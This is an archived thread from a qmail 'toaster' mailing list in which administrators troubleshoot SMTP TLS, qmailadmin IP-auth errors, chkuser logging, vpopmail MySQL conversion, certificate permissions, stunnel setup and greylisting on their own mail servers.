David wrote: Hi all, I have not managed to get SMTP working over SSL with one of Bill's toasters. Is this feature supported ? I am using one of Bill's toasters installed on a RH9 box, everything else works fine. Toaster version 0.7.7. I use Outlook Express as my mail client, and tested it as follows: - I tried sending messages over standard SMTP (port 25), authenticating on the SMTP server with my username (e-mail address) and password - I tried enabling SSL for the SMTP server, and changing the port to 465, and still authenticating on the SMTP server in the same way as before and I just get the the connection to the server has failed, socket error, using SSL message. - I tried the same thing again but with port set to 25, same result. If SSL is not available for SMTP, that is my answer! otherwise... does anybody have any clues ? Any more information I need to provide? Hi, SSL is not available but TLS is (ie secure authentication). I don't use OE so I'm not sure if it supports TLS but Thunderbird does. Regards, Rick !DSPAM:422b2d37116972033915540! Ah. Oh well, I guess can do without SMTP-SSL... Thanks Rick! David.
Re: [toaster] Qmailadmin errors
Thanks guys... - Original Message - From: Tom Collins [EMAIL PROTECTED] To: toaster@shupp.org Sent: Thursday, February 24, 2005 5:23 AM Subject: Re: [toaster] Qmailadmin errors On Feb 23, 2005, at 10:42 AM, Bill Shupp wrote: File error 6 (192.168.0.10, my public ip != 192.168.0.10 .. ip_addr=192.168.0.10returntext=returnhttp= ) Try using --disable-ipauth. I don't know why this started happening out of the blue, though. It's very odd. It's like the web server is setting REMOTE_ADDR to include both the private and public IP of the machine accessing the page. I'm not sure how it could even get the private IP in the first place... That confuses me too; but I have seen a few websites able to return the private IP of my PC. The cryptic File error 6 is a security thing to prevent someone from hijacking your session. If your IP address changes during your QmailAdmin session, it will bail with that error. Ah, cool. Bill has the correct solution, --disable-ipauth in the configuration options. OK, thanks - I will do if it comes to that! This might be interesting -- try running this simple perl script as a cgi and see what it reports: #!/usr/bin/perl print Content-type: text/plain\n\n; foreach (sort keys %ENV) { print $_ is $ENV{$_}\n; } Here are my edited results (sorry did the removing public IP/domain names thing:) DOCUMENT_ROOT is /www/vhost/www.qmailadminsite.tld GATEWAY_INTERFACE is CGI/1.1 HTTP_ACCEPT is image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/vnd.ms-powerpoint, application/vnd.ms-excel, application/msword, application/x-shockwave-flash, */* HTTP_ACCEPT_ENCODING is gzip, deflate HTTP_ACCEPT_LANGUAGE is en-au HTTP_CACHE_CONTROL is max-age=259200 HTTP_CONNECTION is keep-alive HTTP_COOKIE is AWSUSER_ID=awsuser_id1107818209949r6720 HTTP_HOST is www.qmailadminsite.tld HTTP_USER_AGENT is Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.0.3705) HTTP_VIA is 1.1 squid.mylinuxrouter.tld:3128 (squid/2.5.STABLE4-20040111), 1.0 adl-pow-pr1.tpgi.com.au:3128 (squid/2.5.STABLE7) HTTP_X_FORWARDED_FOR is 192.168.0.10, 220.244.57.214 PATH is /sbin:/usr/sbin:/bin:/usr/bin:/usr/X11R6/bin QUERY_STRING is REMOTE_ADDR is looks_like_1_of_my_ISPs_proxys_IP REMOTE_PORT is 53116 REQUEST_METHOD is GET REQUEST_URI is /cgi-bin/test.cgi SCRIPT_FILENAME is /www/cgi-bin/test.cgi SCRIPT_NAME is /cgi-bin/test.cgi SERVER_ADDR is qmailadminIP SERVER_ADMIN is [EMAIL PROTECTED] SERVER_NAME is www.qmailadminsite.tld SERVER_PORT is 80 SERVER_PROTOCOL is HTTP/1.0 SERVER_SIGNATURE is ADDRESSApache/1.3.33 Server at A HREF=mailto:[EMAIL PROTECTED]www.qmailadminsite.tld/A Port 80/ADDRESS SERVER_SOFTWARE is Apache/1.3.33 (Unix) PHP/4.3.10 mod_ssl/2.8.22 OpenSSL/0.9.7d From this, I wonder if our recent change to round-robin of www.qmailadminsite.tld could have affected things? Considering that the check is IP address-based? Only thing is, I wouldn't expect that the IP address could change mid-session... I mean the M$ browser I'm using supposedly caches successful DNS responses for 12 hours by default... Thanks again, David. -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ You don't need a laptop to troubleshoot high-speed Internet: sniffter.com
RE: [toaster] SMTP Auth Doesn't work ??
Tom, Thanx a lot!! Your answer is correct, i have a PIX and they have rewriting the SMTP session. Sincery, thank you! (please, excuse my poor english) -Mensaje original- De: Tom Collins [mailto:[EMAIL PROTECTED] Enviado el: divendres, 4 / febrer / 2005 16:29 Para: toaster@shupp.org Asunto: Re: [toaster] SMTP Auth Doesn't work ?? On Feb 4, 2005, at 6:19 AM, David wrote: At the 127.0.0.1 and in the DMZ looks: 220 DOMAIN ESMTP But out looks: 220 It's normal? No. This has come up before though, on this list last November, here's the answer: http://www.mail-archive.com/toaster@shupp.org/msg01905.html You have a firewall (Cisco PIX or F5 Big IP) that is rewriting the SMTP session. -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ Info on the Sniffter hand-held Network Tester: http://sniffter.com/
[toaster] SMTP Auth Doesn't work ??
Hello, First, excuse my poor English. I have a problem with the SMTP AUTH. I think that Ckkuser is not working properly. I send an email from the same IP segment and no problems. CHKUSER relaying rcpt: from any_existing_mail:any_existing_mail: remote david:unknown::Origin_IP rcpt EMAIL_DESTINO : client allowed to relay CHKUSER rejected relaying: from any_existing_mail:: remote servermail:unknown:Origin_IP rcpt EMAIL_DESTINO : client not allowed to relay What's wrong? Why the first chkuser is any_existing_mail:any_existing_mail: and the second any_existing_mail:: ? The email client responds in the first case: Respuesta del servidor: '553 sorry, that domain isn't in my list of allowed rcpthosts (#5.5.3 - chkuser)', Puerto: 25, Seguridad (SSL): No, Error de servidor: 553, Número de error: 0x800CCC79 Configuration: tcp.smtp 127.:allow,RELAYCLIENT= :allow,QMAILQUEUE=/var/qmail/bin/simscan qmail vpopmail spamassasin clamav simscan Any ideas? Thanx.
[toaster] CHKUSER messages appearing in log
Just a quick one - I noticed after upgrading to the 0.7.2 toaster (on RedHat 9), that I'm now getting CHKUSER lines in /var/log/qmail/current like so: CHKUSER accepted rcpt: from [EMAIL PROTECTED]:: remote [EMAIL PROTECTED]:unknown:12.345.678.90 rcpt [EMAIL PROTECTED] : found existing recipient ...this is good! Just wondered, is this something that has been added in toaster 0.7.2, or was I just doing something wrong before (with 0.6 / RH9)? Thanks, David.
Re: [toaster] Latest toaster
Thanks greatly for the very detailed instructions Bill, I will see how I go... I hope that I can get simscan working with dspam because I would like virus scanning... Before I do I just thought it might be worth asking if there was a disadvantage to doing things this way (having messages stored in sql database instead of on disk)? I was interested in an sql backend because I thought that way the number of users would scale better and I was really worried about doing something to the filesystem that would corrupt/lose messages for potentially many users (I use a few CGI scripts to make administration easier). Are there drawbacks to doing things this way, other than the obvious increase in complexity and overhead ? David. - Original Message - From: Bill Shupp [EMAIL PROTECTED] To: toaster@shupp.org Sent: Wednesday, January 05, 2005 2:22 AM Subject: Re: [toaster] Latest toaster David wrote: - how can I configure the toaster with vpopmail mysql backend for users (just the users, keeping the preferences - .qmail files etc - as normal) I am aware of the tools to convert from flat-file to mysql and vice-versa, but I have thus far failed in converting a .6 toaster install to use mysql... - compile new vpopmail source with --enable-auth-module=mysql, but do NOT install it. - setup mysql database per README.mysql, and then ~vpopmail/etc/vpopmail.mysql with the connection info - from the new source directory, run ./vconvert -c -m, and it will add all your information to the new vpopmail tables - test the new database with ./vuserinfo [EMAIL PROTECTED] to make sure it works. - make install - when you recompile the new versions of linked programs like qmailadmin, courier-imap and qmail-smtpd, they will start using the mysql database. - the default simscan config in the toaster is to use spam filtering - can I use this with dspam (which I have working with a .6 toaster) without conflicts/problems ? I've never setup dspam, but I'm not sure simscan supports it (if it needs an smtp harness). - If I re-install from toaster .6, is there anything special I have to do to keep my ~vpopmail/domains folder and make it work with .7 ? No. I appologise if the last question has been asked before, I haven't searched *that much* for the answer yet... mainly interested in the first two. Thanks everyone for your time and for a great setup Bill. You're welcome. Regards, Bill
Re: [toaster] Latest toaster
Messages stored in SQL?? You can have the users and passwords stored there, but there's really no reason at all to store the messages in SQL.. (I'm not even aware of a patch that can provide this functionality) oops i was forgetting a bit confused there - maildir is the most reliable for storing the messages! Just users passwords that go in the database. Plus you have the ability to create an endless number of useless data reports! How often people log in, average mail per user, etc.. *grin* :) I like things like that... never too many graphs... and of course it will make scripting so much easier without having to 'suexec' scripts to access the data. Thanks for the help, David. - Original Message - From: Jason 'XenoPhage' Frisvold [EMAIL PROTECTED] To: toaster@shupp.org Sent: Thursday, January 06, 2005 1:51 AM Subject: Re: [toaster] Latest toaster David wrote: Thanks greatly for the very detailed instructions Bill, I will see how I go... I hope that I can get simscan working with dspam because I would like virus scanning... I don't think simscan supports dspam yet.. It was talked about, but I'm not sure support was added yet.. Before I do I just thought it might be worth asking if there was a disadvantage to doing things this way (having messages stored in sql database instead of on disk)? Messages stored in SQL?? You can have the users and passwords stored there, but there's really no reason at all to store the messages in SQL.. (I'm not even aware of a patch that can provide this functionality) I was interested in an sql backend because I thought that way the number of users would scale better and I was really worried about doing something to the filesystem that would corrupt/lose messages for potentially many users (I use a few CGI scripts to make administration easier). Are there drawbacks to doing things this way, other than the obvious increase in complexity and overhead ? SQL speeds things up a little when dealing with a large number of users. It does cause extra complexity, and adds more failure points. But, it's fairly easy to replicate elsewhere, and re-building the database on a new machine is pretty simple. Plus you have the ability to create an endless number of useless data reports! How often people log in, average mail per user, etc.. *grin* David. -- --- Jason 'XenoPhage' Frisvold Engine / Technology Programmer [EMAIL PROTECTED] RedHat Certified - RHCE # 803004140609871 MySQL Pro Certified - ID# 207171862 MySQL Core Certified - ID# 205982910 --- Something mysterious is formed, born in the silent void. Waiting alone and unmoving, it is at once still and yet in constant motion. It is the source of all programs. I do not know its name, so I will call it the Tao of Programming.
[toaster] Latest toaster
Hi all, Noticed that the toaster has been updated to 0.7 stable - fantastic, great job bill, I'm going to be upgrading ASAP... ...but I have a couple of questions about the new toaster I hope someone wouldn't mind answering: - how can I configure the toaster with vpopmail mysql backend for users (just the users, keeping the preferences - .qmail files etc - as normal) I am aware of the tools to convert from flat-file to mysql and vice-versa, but I have thus far failed in converting a .6 toaster install to use mysql... - the default simscan config in the toaster is to use spam filtering - can I use this with dspam (which I have working with a .6 toaster) without conflicts/problems ? - If I re-install from toaster .6, is there anything special I have to do to keep my ~vpopmail/domains folder and make it work with .7 ? I appologise if the last question has been asked before, I haven't searched *that much* for the answer yet... mainly interested in the first two. Thanks everyone for your time and for a great setup Bill.
[toaster] Qmail - TLS help
I've set up a couple SMTP gateways using the instructions on http://qmailrocks.org. I did NOT install vpopmail or the associated tools, as these servers are used for smtp only are not hosting any mailboxes. I'm getting the following error when mail is sent to ONE domain thru these servers: TLS found no client cert in control/clientcert.pem I'm not going to try again; this message has been in the queue too long. Here is an ls of /var/qmail/control:
[toaster] Qmail-tls help
Title: Qmail-tls help Heres the full message. Sorry for the duplication I've got a qmailrocks install, on RH enterprise 3.0. Im getting the following error when mail is sent to ONE domain: TLS found no client cert in control/clientcert.pem I'm not going to try again; this message has been in the queue too long. Here's an ls -l /var/qmail/control: [EMAIL PROTECTED] control]# ls -l lrwxrwxrwx 1 vpopmail vchkpw 33 Dec 21 12:02 clientcert.pem - /var/qmail/control/servercert.pem -rw-r--r-- 1 root root 3 Dec 21 12:10 concurrencyincoming -rw-r--r-- 1 root root 4 Dec 21 12:10 concurrencyremote -rw-r--r-- 1 root root 10 Dec 21 12:10 defaultdelivery -rw-r--r-- 1 root root 13 Dec 21 12:01 defaultdomain -rw-r--r-- 1 root root 13 Dec 21 12:52 doublebounceto -rw-r--r-- 1 root root 22 Dec 21 12:01 locals -rw-r--r-- 1 root root 22 Dec 21 12:01 me -rw-r--r-- 1 root root 13 Dec 21 12:01 plusdomain -rw-r--r-- 1 root root 6 Dec 21 12:52 queuelifetime -rw-r--r-- 1 root root 22 Dec 21 12:01 rcpthosts -rw-r- 1 vpopmail vchkpw 2168 Dec 21 12:02 servercert.pem -rw-r--r-- 1 root root 2 Dec 26 11:47 smtpforcetls -rw-r--r-- 1 root root 4 Dec 21 12:51 timeoutremote -rw-r--r-- 1 root root 4 Dec 21 12:51 timeoutsmtpd Any help would be greatly appreciated. thanks __ [EMAIL PROTECTED] m:917.337.0471 w:212.204.1961 __
Re: [toaster] Qmail - TLS help
Yes it does. One respondent from the qmr list suggested I delete both pem files from /var/qmail/control. After doing that, the error has gone away. Its an ugly answer, but it worked. Thanks for any more insight, David __ david pollack acxiom corporation m:917.337.0471 w:212.204.1961 __ -Original Message- From: Bill Shupp [EMAIL PROTECTED] To: toaster@shupp.org toaster@shupp.org Sent: Sun Dec 26 21:45:23 2004 Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: Heres the full message. Sorry for the duplication I've got a qmailrocks install, on RH enterprise 3.0. First off, this is not the qmailrocks mailing list.. and I'm not sure sure how that install does things (you'd probably have better luck on that list). However, if qmail-smtpd can't read the clientcert.pem which is clearly there, then it probably does not have permissions. Does qmail-smtpd run as vpopmail:vchkpw, which is how your clientcert.pem is owned? Regards, Bill
Re: [toaster] Qmail - TLS help
Now THAT makes sense! Thanks! __ david pollack acxiom corporation m:917.337.0471 w:212.204.1961 __ -Original Message- From: Bill Shupp [EMAIL PROTECTED] To: toaster@shupp.org toaster@shupp.org Sent: Sun Dec 26 22:18:34 2004 Subject: Re: [toaster] Qmail - TLS help Pollack, David wrote: Yes it does. One respondent from the qmr list suggested I delete both pem files from /var/qmail/control. After doing that, the error has gone away. Its an ugly answer, but it worked. Duh, I forgot that clientcert.pem is used by *qmail-remote*, not qmail-smtpd. qmail-remote can't make a TLS connection to a remote server that support STARTTLS because it can't read its client certificate. Try this (after re-creating your deleted certs): chown vpopmail:qmail /var/qmail/control/servercert.pem. This way, qmail-remote can read it too. This is exactly what my toaster patch set does at the end of make cert. Regards, Bill
RE: [toaster] Qmail - TLS help
Bingo. Thanks so much. I was following the instructions here: http://qmailrocks.org/qmail.htm which, otherwise, are excellent. Duh, I forgot that clientcert.pem is used by *qmail-remote*, not qmail-smtpd. qmail-remote can't make a TLS connection to a remote server that support STARTTLS because it can't read its client certificate. Try this (after re-creating your deleted certs): chown vpopmail:qmail /var/qmail/control/servercert.pem. This way, qmail-remote can read it too. This is exactly what my toaster patch set does at the end of make cert. Regards, Bill application/ms-tnef
Re: [toaster] Changing Passwords
Yes, I have the right permissions and debug mode vconvert still shows up all OK... In the meantime to solve my password problem I have discovered that users can just log in to qmailadmin (as normal users not administrators) and receive a screen that just lets them change their user details - ie. password, vacation message etc. David. - Original Message - From: Júlio Olivares [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 22, 2004 6:45 AM Subject: Re: [toaster] Changing Passwords Are you sure that the mysql user/pass is correct and the user has the right permissions ? I think if you run vconvert with -d (debug) you will see the error. But there are no tables in the vpopmail database. Is there something else I need to do or have I done something wrong? Thanks, David.
Re: [toaster] Changing Passwords
- Original Message - From: Tom Collins [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Monday, November 22, 2004 1:10 AM Subject: Re: [toaster] Changing Passwords On Nov 21, 2004, at 5:18 AM, David wrote: Does anyone have any pointers for how to change the stock qmail toaster install (0.6) to use mysql authentication so that I can use one of these password plugins for squirrelmail? (btw I don't know which password plugin exactly to use) When configuring vpopmail, use --enable-auth-module=mysql. You'll need to create a vpopmail user and vpopmail table in your MySQL database, assign the vpopmail user full access to the vpopmail table, and then put that information in ~vpopmail/etc/vpopmail.mysql. To convert existing cdb domains to MySQL, use the vconvert program that's a part of vpopmail. -- Tom Collins - [EMAIL PROTECTED] QmailAdmin: http://qmailadmin.sf.net/ Vpopmail: http://vpopmail.sf.net/ Info on the Sniffter hand-held Network Tester: http://sniffter.com/ Thanks Tom - I created a vpopmail database user, reconfigured, compiled installed vpopmail and enabled mysql, edited the vpopmail.mysql file and re-configured, compiled installed qmailadmin all successfully I then ran the vconvert utility as: vconvert -c -m and received an output like: converting mydomain.com ...done converting another-domain.com ...done converting another-domain.com.au ...done I then restarted all the qmail vpopmail processes with qmailctl stop ; qmailctl start vpopmailctl stop ; vpopmailctl start qmailadmin still works - all my accounts forwards etc. are still there. But there are no tables in the vpopmail database. Is there something else I need to do or have I done something wrong? Thanks, David.
Re: [toaster] Changing Passwords
Thanks Júlio - I have version 0.6 of the toaster installed and it uses squirrelmail instead of sqwebmail, which uses a perl-driven text menu for configuration - is there an equivalent option to --enable-changepass I can use for squirrelmail ? Thanks again, David. - Original Message - From: Júlio Manuel Olivares [EMAIL PROTECTED] To: [EMAIL PROTECTED] Sent: Sunday, November 21, 2004 6:11 AM Subject: Re: [toaster] Changing Passwords Are you using mysql ? If so you can do it with a php or perl script, otherwise you will need qmailadmin, or sqwebmail compiled with --enable-changepass. - Original Message - From: David [EMAIL PROTECTED] To: Qmail Toaster [EMAIL PROTECTED] Sent: Saturday, November 20, 2004 7:28 PM Subject: [toaster] Changing Passwords Hi all, I have the toaster installed and working successfully, but have a question about changing passwords - how can I enable my useres to change their passwords themselves? Do I have to give them access to qmailadmin? David.
[toaster] Attachment trouble
Hi All, I have Bill's fantastic qmail toaster installed on a RedHat 9 box and have had no trouble with it at all. However I have run into a problem recently with an e-mail sent from an external domain which runs an exchange server being rejected with the message: The recipient name is not recognized The MTS-ID of the original message is: c=US;a= ;p=Parex Industries;l=MAXWELL-041018225319Z-25226 Which I think is an Exchange error... however this only occurs when sending e-mails with attachments of 2-4 MB (and I haven't set any attachment size limits, it's just a standard toaster install). Can anybody offer any suggestions? Thankyou, David.
Re: [toaster] stunnel and redhat enterprise 3.0
On Wed, 2004-09-29 at 20:04, Jason 'XenoPhage' Frisvold wrote: Hi all, I just determined that pop3ds is not working at all here... Apparently the script calls several parameters for stunnel that are no longer available in stunnel? I have the stock pop3ds run file from the toaster which assumes stunnel 3.x ... I'm running stunnel 4.x ... Anyone know how to set this up for stunnel 4.x ?? I think stunnel changed from using arguments on command line to a configuration file. This is my qmail-pop3ds supervise run script: #!/bin/sh VPOPMAILUID=`id -u vpopmail` VPOPMAILGID=`id -g vpopmail` exec envdir /etc/relay-ctrl \ /usr/bin/relay-ctrl-chdir \ /usr/local/bin/tcpserver -l 0 -R -H -v \ -u$VPOPMAILUID -g$VPOPMAILGID 0 995\ /usr/sbin/stunnel /etc/stunnel/qmail.conf 21 And this is the /etc/stunnel/qmail.conf file: cat /etc/stunnel/qmail.conf # Sample qmail-pop3d with relay-ctrl config file # Paul Foremski ( pavcio(at)users.sf.net ) #cert = /usr/local/etc/stunnel/stunnel.pem cert = /etc/stunnel/pop3d.pem debug = 7 #output = /var/log/stunnel.log # client = no foreground = yes exec = /var/qmail/bin/qmail-popup execargs = qmail-popup alien77.com /Appz2/VPopMail/bin/vchkpw /usr/bin/relay-ctrl-allow /var/qmail/bin/qmail-pop3d Maildir Hope that helps.
[toaster] SMTP-AUTH
Can anyone explain how SMTP-AUTH works in conjunction with the toaster? It have SMTP-AUTH working on other servers just fine so I am familiar with the over concepts. The part that I don't get relative to the toaster is where/how is user authentication handled? When I give it the same access info that works to retrieve mail ([EMAIL PROTECTED] plus password) SMTP-AUTH fails to authenticate. Does the access database need to be setup separately or is it supported to pull that data from vpopmail? TIA David Shirley http://www.webquarry.com
[toaster] addressbook in squirrelmail
Does anyone know where squirrelmail stores it's address books in this implementation of the toaster? TIA David Shirley http://www.webquarry.com
[toaster] Interesting story about greylisting with the toaster
I deployed a new toaster the other day and added the greylisting feature since the users on the old toaster were getting fed up with the heavy volume of spam that they were getting. The install went great and we moved all the user accounts to the new machine without incident. The really screwy thing is that immediately after it went into service, we started getting swamped with calls from users that were paniced because they didn't see a steady stream of junk coming into their mailboxes! They figured that email HAD to be broken. Even when we explained what was happening, they still couldn't accept it. We suggested that they test it out be sending emails to themselves from outside accounts like yahoo, etc. Naturally, they received those messages after the one-time greylist delay exactly as we told them would happen. It didn't matter. They were still convinced that something wasn't right since they didn't see the previous volume of junk mail! It was so strange having to assure people that the absence of junk mail was a GOOD thing and having them doubt us on it. Even though so far no user has been able to produce a test that fails to be delivered, the general consensus of the users that we have talked to is extreme skepticism. They seem to feel that NOTHING could or should work that well without causing at least some form of problem for them. Needless to say, this is not the reaction that we were expecting. To one user's credit, I have to report that although he screamed the loudest and made a HUGE fuss, once he saw how well it worked he placed an overseas call all the way from Australia and spent about ten minutes apologizing to any and every one that was available to talk to him. It sort of made dealing with all the other numskulls worthwhile... Anyone else have a similar experience? David Shirley
[toaster] moving domains to another toaster
Hello I am in the process of moving some domains from one toaster box to another (the second one adds things like chkusr, greylisting and such) and I have copied /home/vpopmail/domains, /var/qmail/control and /var/qmail/users but my users cannot log in nor does mail get delivered. What else am I missing? David Shirley
Re: [toaster] moving domains to another toaster (answering my own question...)
Userid #'s in /var/qmail/users/assign were wrong. A quick: sed s/old#:old#/new#:new#/g assign assign.new fixed it right up. On Thursday, July 29, 2004, at 03:13 PM, David M. Shirley wrote: Hello I am in the process of moving some domains from one toaster box to another (the second one adds things like chkusr, greylisting and such) and I have copied /home/vpopmail/domains, /var/qmail/control and /var/qmail/users but my users cannot log in nor does mail get delivered. What else am I missing? David Shirley David Shirley http://www.webquarry.com
Re: [toaster] chkuser patch
Yes, you will find in the smtpd log file lines like this: 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) On Mon, 2004-07-26 at 07:04, Jeff Koch wrote: Hi: Does anyone know if there is any logging of connections rejected by the chkuser patch? Best Regards, Jeff Koch, Intersessions
Re: [toaster] chkuser patch - logging
I didn't realize before. Yes, probably I have that information because I'm using recordio inside the qmail-smtpd run script. Here's an excerpt of qmail-smtpd run: /usr/bin/recordio /usr/local/bin/rblsmtpd -b -r sbl.spamhaus.org -r relays.ordb.org \ /usr/bin/relay-ctrl-check /var/qmail/bin/qmail-smtpd Just place the recordio call before qmail-smtpd's call. But you know, with recordio you're gonna log lot of information... On Mon, 2004-07-26 at 15:14, Jeff Koch wrote: Hi David: Thanks but is there something I need to turn on. We have the chkuser patch working on three mailservers ( I know because of the rejection replies to test messages) but there are no entries in the /var/log/qmail/smtpd logs. At 02:49 AM 7/26/2004, you wrote: Yes, you will find in the smtpd log file lines like this: 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) On Mon, 2004-07-26 at 07:04, Jeff Koch wrote: Hi: Does anyone know if there is any logging of connections rejected by the chkuser patch? Best Regards, Jeff Koch, Intersessions Best Regards, Jeff Koch, Intersessions
Re: [toaster] Bouncing messages from another mailserver
On Wed, 2004-07-07 at 19:33, Jason 'XenoPhage' Frisvold wrote: On Wed, 2004-07-07 at 13:32, Lars E. D. Jensen wrote: Hi list A scenario which happens very often on my server. 1. A spammer sends to a non-existent user on my mailserver 2. My mailserver answers back to the sender (which is also a non-existent user on another mailserver) 3. The foreign mailserver answers back to my mailservers admin e-mailaddress, that the user is non-existent 4. Message double bounces between the two mailservers. 5. Message failure is sent to admin e-mailaddress on my mailserver. Question: Can the chk-user patch avoid these double bounces ? An emphatic YES! The chkusr patch is extremely good at preventing most of these situations... :) Or is there some other way of avoiding these unnecessary bounces? I haven't installed chk-user patch yet in production. Thanks Med venlig hilsen / Best regards Lars E. D. Jensen [EMAIL PROTECTED] Jason is right, chkusr patch will end those bounces. And also will save you bandwith and processing time since it stops those mails right at SMTP level. You'll find something like this on the smtpd logs: 550 sorry, no mailbox here by that name (#5.1.1 - chkusr)
Re: [toaster] qmail-smtpd-chkusr (renamed qmail-smtpd)
On Tue, 2004-06-29 at 19:55, Lars E. D. Jensen wrote: Hi Maybe a stupid question, but do I have to rename qmail-smtpd-chkusr in order to get the chk-user patch to work? And how can I see if emails are denied? Hi, renamed not needed. Just apply the right patch (mysql or cdb). And you will see something like this on your qmail-smtpd log file: 550 sorry, no mailbox here by that name (#5.1.1 - chkusr) You could also place recordio in the qmail-smtpd run script and log more information about the smtp conversation.
[toaster] Upgrading existing toaster to netmail
Hello I have a toaster that is currently running qmail 1.03 with vpopmail 5.3.6. This toaster is currently running fine and will soon be replaced by a newer toaster running all the latest stuff. In the meantime, I would like to move this existing toaster to netmail with the chkusr patch to make more efficient use of the queue. Is that going to be as simple as patching and compiling netmail, stopping qmail, installing netmail, then starting netmail? Does vpopmail care what version of qmail is running? Or is there more that I need to update in order to make this happen? Thanks in advance! David Shirley http://www.webquarry.com
Re: [toaster] Upgrading existing toaster to netmail
Thanks Bill. I assume that if there is a problem, I can revert back to the old qmail just by jumping back into the /var/src/qmail-1.03 dir (still left intact from the original install) and do a make setup check to put all the old files back and then add the hostname arg back to qmail-smtpd's run file right? On an unrelated issue, does the date printed for qmail-qread entries signify that date that particular message will be re-tried? example entry - 23 Jun 2004 23:29:59 GMT #896455 556 [originating-address-scrubbed] remote [remote-address-scrubbed] - Or is that the date that the email was sent? What makes qmail decide when it is time to retry that message? On Wednesday, June 23, 2004, at 06:18 PM, Bill Shupp wrote: David M. Shirley wrote: Hello I have a toaster that is currently running qmail 1.03 with vpopmail 5.3.6. This toaster is currently running fine and will soon be replaced by a newer toaster running all the latest stuff. In the meantime, I would like to move this existing toaster to netmail with the chkusr patch to make more efficient use of the queue. Is that going to be as simple as patching and compiling netmail, stopping qmail, installing netmail, then starting netmail? Does vpopmail care what version of qmail is running? Or is there more that I need to update in order to make this happen? Thanks in advance! Just make sure you remove the hostname argument to qmail-smtpd. Other than that, it's pretty much the same. Regards, Bill David Shirley http://www.webquarry.com
[toaster] question about chkuser-0.6.mysql.patch
I guess no one knows the answer to this one huh? Hello I'm modifying a toaster (current version of toaster on all software) to use the mysql auth rather than cdb files. I'm also trying to add the chkuser-0.6.mysql.patch but it fails at hunk 4 From qmail-smtpd.c.rej I see: *** *** 413,418 } else if (!addrallowed()) { err_nogateway(); return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); --- 610,616 } else if (!addrallowed()) { err_nogateway(); return; } + if (!realrcpt_check()) { err_realrcpt(); return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); Now I'm not a programmer by any means but It appears to be trying to insert a single line: if (!realrcpt_check()) { err_realrcpt(); return; } When I look in qmail-smtpd.c and look for the lines around where the insert is supposed to happen I see: } else { if (!addrallowed()) { err_nogateway(); return; } if (!envelope_scanner()) return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); Now I figure you could probably toss that extra line in there just about anywhere and still be able to compile the program but you might be calling realrcpt_check() at the wrong time and thus negate it's benefit. Can anyone clear up exactly where that line is supposed to be inserted? TIA! David Shirley http://www.webquarry.com David Shirley http://www.webquarry.com
[toaster] question about chkuser-0.6.mysql.patch
Hello I'm modifying a toaster (current version of toaster on all software) to use the mysql auth rather than cdb files. I'm also trying to add the chkuser-0.6.mysql.patch but it fails at hunk 4 From qmail-smtpd.c.rej I see: *** *** 413,418 } else if (!addrallowed()) { err_nogateway(); return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); --- 610,616 } else if (!addrallowed()) { err_nogateway(); return; } + if (!realrcpt_check()) { err_realrcpt(); return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); Now I'm not a programmer by any means but It appears to be trying to insert a single line: if (!realrcpt_check()) { err_realrcpt(); return; } When I look in qmail-smtpd.c and look for the lines around where the insert is supposed to happen I see: } else { if (!addrallowed()) { err_nogateway(); return; } if (!envelope_scanner()) return; } if (!stralloc_cats(rcptto,T)) die_nomem(); if (!stralloc_cats(rcptto,addr.s)) die_nomem(); if (!stralloc_0(rcptto)) die_nomem(); Now I figure you could probably toss that extra line in there just about anywhere and still be able to compile the program but you might be calling realrcpt_check() at the wrong time and thus negate it's benefit. Can anyone clear up exactly where that line is supposed to be inserted? TIA! David Shirley http://www.webquarry.com
[toaster] converting to mysql
Hello I have a working toaster plus graylisting (latest toaster) that currently does not use mysql authorization (It DOES use mysql for the graylisting of course). My question is: what steps do I need to take to change this over to using mysql authorization? I want to move another set of domains from a toaster that uses mysql over to this newer toaster and don't see any easy way of doing that unless both toasters use the same method of authentication... Do I have to recompile qmail(netmail) or just vpopmail and squirrelmail? Thanks in advance!
Re: [toaster] converting to mysql
Ok. Are there any other patches that need to be made to qmail or anything else or is it just the linked library issues that need to be addressed after enabling mysql in vpopmail? On Friday, June 4, 2004, at 02:01 PM, Bill Shupp wrote: Do I have to recompile qmail(netmail) or just vpopmail and squirrelmail? Yes, when ever you re-compile vpopmail, you should recompile anything that is linked to the library, since it's static. i.e. qmailadmin, vqadmin, qmail-smtpd (w/ chkuser), courier-imap, etc... David Shirley http://www.webquarry.com
Re: Re[2]: [toaster] rblsmtpd and toaster
